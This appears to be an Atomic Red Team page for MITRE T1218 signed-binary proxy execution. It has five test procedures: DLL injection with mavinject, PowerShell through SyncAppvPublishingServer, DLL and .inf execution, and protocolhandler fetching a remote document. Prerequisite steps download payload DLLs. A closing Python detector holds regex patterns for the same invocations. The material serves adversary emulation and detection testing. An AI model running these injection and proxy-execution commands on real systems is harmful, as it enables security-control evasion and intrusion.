Adversaries may bypass process and/or signature-based defenses by proxying execution of malicious content with signed binaries. Binaries signed with trusted digital certificates can execute on Windows systems protected by digital signature validation. Several Microsoft signed binaries that are default on Windows installations can be used to proxy execution of other files.
Atomic Tests:

- Atomic Test #1 - mavinject - Inject DLL into running process
- Atomic Test #2 - SyncAppvPublishingServer - Execute arbitrary PowerShell code
- Atomic Test #3 - Register-CimProvider - Execute arbitrary DLL
- Atomic Test #4 - InfDefaultInstall.exe - Execute a .inf file
- Atomic Test #5 - ProtocolHandler.exe Downloaded a Suspicious File
## Atomic Test #1 - mavinject - Inject DLL into running process

Injects arbitrary DLL into running process specified by process ID. Requires Windows 10.

Supported Platforms: Windows

Inputs:

Name | Description | Type | Default Value |
---|---|---|---|
process_id | PID of process receiving injection | string | 1000 |
dll_payload | DLL to inject | Path | PathToAtomicsFolder\T1218\src\x64\T1218.dll |

Attack Commands (command prompt):

```cmd
mavinject.exe #{process_id} /INJECTRUNNING #{dll_payload}
```

Dependencies (PowerShell):

Check Prereq Commands:

```powershell
if (Test-Path #{dll_payload}) {exit 0} else {exit 1}
```

Get Prereq Commands:

```powershell
New-Item -Type Directory (split-path #{dll_payload}) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218/src/x64/T1218.dll" -OutFile "#{dll_payload}"
```
## Atomic Test #2 - SyncAppvPublishingServer - Execute arbitrary PowerShell code

Executes arbitrary PowerShell code using SyncAppvPublishingServer.exe. Requires Windows 10.

Supported Platforms: Windows

Inputs:

Name | Description | Type | Default Value |
---|---|---|---|
powershell_code | PowerShell code to execute | string | Start-Process calc.exe |

Attack Commands (command prompt):

```cmd
SyncAppvPublishingServer.exe "n; #{powershell_code}"
```
## Atomic Test #3 - Register-CimProvider - Execute arbitrary DLL

Executes an arbitrary DLL via Register-CimProvider.exe. Requires at least Windows 8/2012. Note that the DLL can also be served over SMB.

Supported Platforms: Windows

Inputs:

Name | Description | Type | Default Value |
---|---|---|---|
dll_payload | DLL to execute | Path | PathToAtomicsFolder\T1218\src\Win32\T1218-2.dll |

Attack Commands (command prompt):

```cmd
C:\Windows\SysWow64\Register-CimProvider.exe -Path #{dll_payload}
```

Dependencies (PowerShell):

Check Prereq Commands:

```powershell
if (Test-Path #{dll_payload}) {exit 0} else {exit 1}
```

Get Prereq Commands:

```powershell
New-Item -Type Directory (split-path #{dll_payload}) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218/src/Win32/T1218-2.dll" -OutFile "#{dll_payload}"
```
## Atomic Test #4 - InfDefaultInstall.exe - Execute a .inf file

Tests execution of a .inf file using InfDefaultInstall.exe.

Reference: https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSBinaries/Infdefaultinstall.yml

Supported Platforms: Windows

Inputs:

Name | Description | Type | Default Value |
---|---|---|---|
inf_to_execute | Local location of inf file | string | PathToAtomicsFolder\T1218\src\Infdefaultinstall.inf |

Attack Commands (command prompt):

```cmd
InfDefaultInstall.exe #{inf_to_execute}
```

Dependencies (PowerShell):

Check Prereq Commands:

```powershell
if (Test-Path #{inf_to_execute}) {exit 0} else {exit 1}
```

Get Prereq Commands:

```powershell
New-Item -Type Directory (split-path #{inf_to_execute}) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218/src/Infdefaultinstall.inf" -OutFile "#{inf_to_execute}"
```
## Atomic Test #5 - ProtocolHandler.exe Downloaded a Suspicious File

Emulates an attack delivered through a document via the Microsoft Office protocol handler. On successful execution you should see Microsoft Word launch a blank file.

Supported Platforms: Windows

Inputs:

Name | Description | Type | Default Value |
---|---|---|---|
microsoft_wordpath | path to office folder | path | C:\Program Files\Microsoft Office\Office16 |
remote_url | url to document | url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218/src/T1218Test.docx |

Attack Commands (command prompt; the executable path is quoted because the default Office folder contains spaces):

```cmd
"#{microsoft_wordpath}\protocolhandler.exe" "ms-word:nft|u|#{remote_url}"
```

Dependencies (PowerShell):

Description: Microsoft Word must be installed with the correct path and protocolhandler.exe must be provided.

Check Prereq Commands:

```powershell
if (Test-Path "#{microsoft_wordpath}\protocolhandler.exe") {exit 0} else {exit 1}
```

Get Prereq Commands:

```powershell
write-host "Install Microsoft Word or provide correct path."
```
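A defender-side check for the five signed binaries these tests exercise, added here as an example and not part of the Atomic Red Team project: it parses constructed Sysmon-style process-creation lines (sample data; the `Image=... CommandLine=...` layout is an assumption) and flags only invocations whose arguments match the command shapes used by the tests above, so routine uses of the same binaries are not reported.

```python
import re

# Signed Windows binaries exercised by the T1218 tests on this page, each
# paired with the command-line shape its test uses. Keying on the argument
# rather than the image name alone cuts noise from benign uses of the binary.
SUSPICIOUS_ARGS = {
    "mavinject.exe": re.compile(r"/INJECTRUNNING\b", re.I),
    "syncappvpublishingserver.exe": re.compile(r'"\s*n;', re.I),
    "register-cimprovider.exe": re.compile(r"-Path\s+\S+\.dll\b", re.I),
    "infdefaultinstall.exe": re.compile(r"\S+\.inf\b", re.I),
    "protocolhandler.exe": re.compile(r"ms-word:", re.I),
}

# Constructed Sysmon-style process creation lines (sample data, not real
# telemetry). The last two lines are benign and must not be flagged.
SAMPLE_LOG = """\
Image=C:\\Windows\\System32\\mavinject.exe CommandLine=mavinject.exe 1000 /INJECTRUNNING C:\\AtomicRedTeam\\atomics\\T1218\\src\\x64\\T1218.dll
Image=C:\\Windows\\System32\\SyncAppvPublishingServer.exe CommandLine=SyncAppvPublishingServer.exe "n; Start-Process calc.exe"
Image=C:\\Windows\\SysWow64\\Register-CimProvider.exe CommandLine=Register-CimProvider.exe -Path C:\\AtomicRedTeam\\atomics\\T1218\\src\\Win32\\T1218-2.dll
Image=C:\\Windows\\System32\\InfDefaultInstall.exe CommandLine=InfDefaultInstall.exe C:\\AtomicRedTeam\\atomics\\T1218\\src\\Infdefaultinstall.inf
Image=C:\\Program Files\\Microsoft Office\\Office16\\protocolhandler.exe CommandLine=protocolhandler.exe "ms-word:nft|u|https://example.invalid/T1218Test.docx"
Image=C:\\Windows\\System32\\notepad.exe CommandLine=notepad.exe C:\\Users\\alice\\notes.txt
Image=C:\\Windows\\System32\\mavinject.exe CommandLine=mavinject.exe /?
"""

LINE_RE = re.compile(r"^Image=(?P<image>.*?)\s+CommandLine=(?P<cmd>.*)$")

def parse_line(line):
    """Split one 'Image=... CommandLine=...' line into (image, cmdline)."""
    m = LINE_RE.match(line)
    return (m.group("image"), m.group("cmd")) if m else None

def match_event(image, cmdline):
    """Return the binary name if the event matches a T1218 pattern, else None."""
    name = image.rsplit("\\", 1)[-1].lower()
    rule = SUSPICIOUS_ARGS.get(name)
    return name if rule and rule.search(cmdline) else None

def scan_log(text):
    """Return [(binary, cmdline)] for every flagged line in the log text."""
    findings = []
    for line in text.splitlines():
        parsed = parse_line(line)
        if parsed and (hit := match_event(*parsed)):
            findings.append((hit, parsed[1]))
    return findings
```

Running `scan_log(SAMPLE_LOG)` returns the five test invocations and skips the notepad line and the bare `mavinject.exe /?` help call.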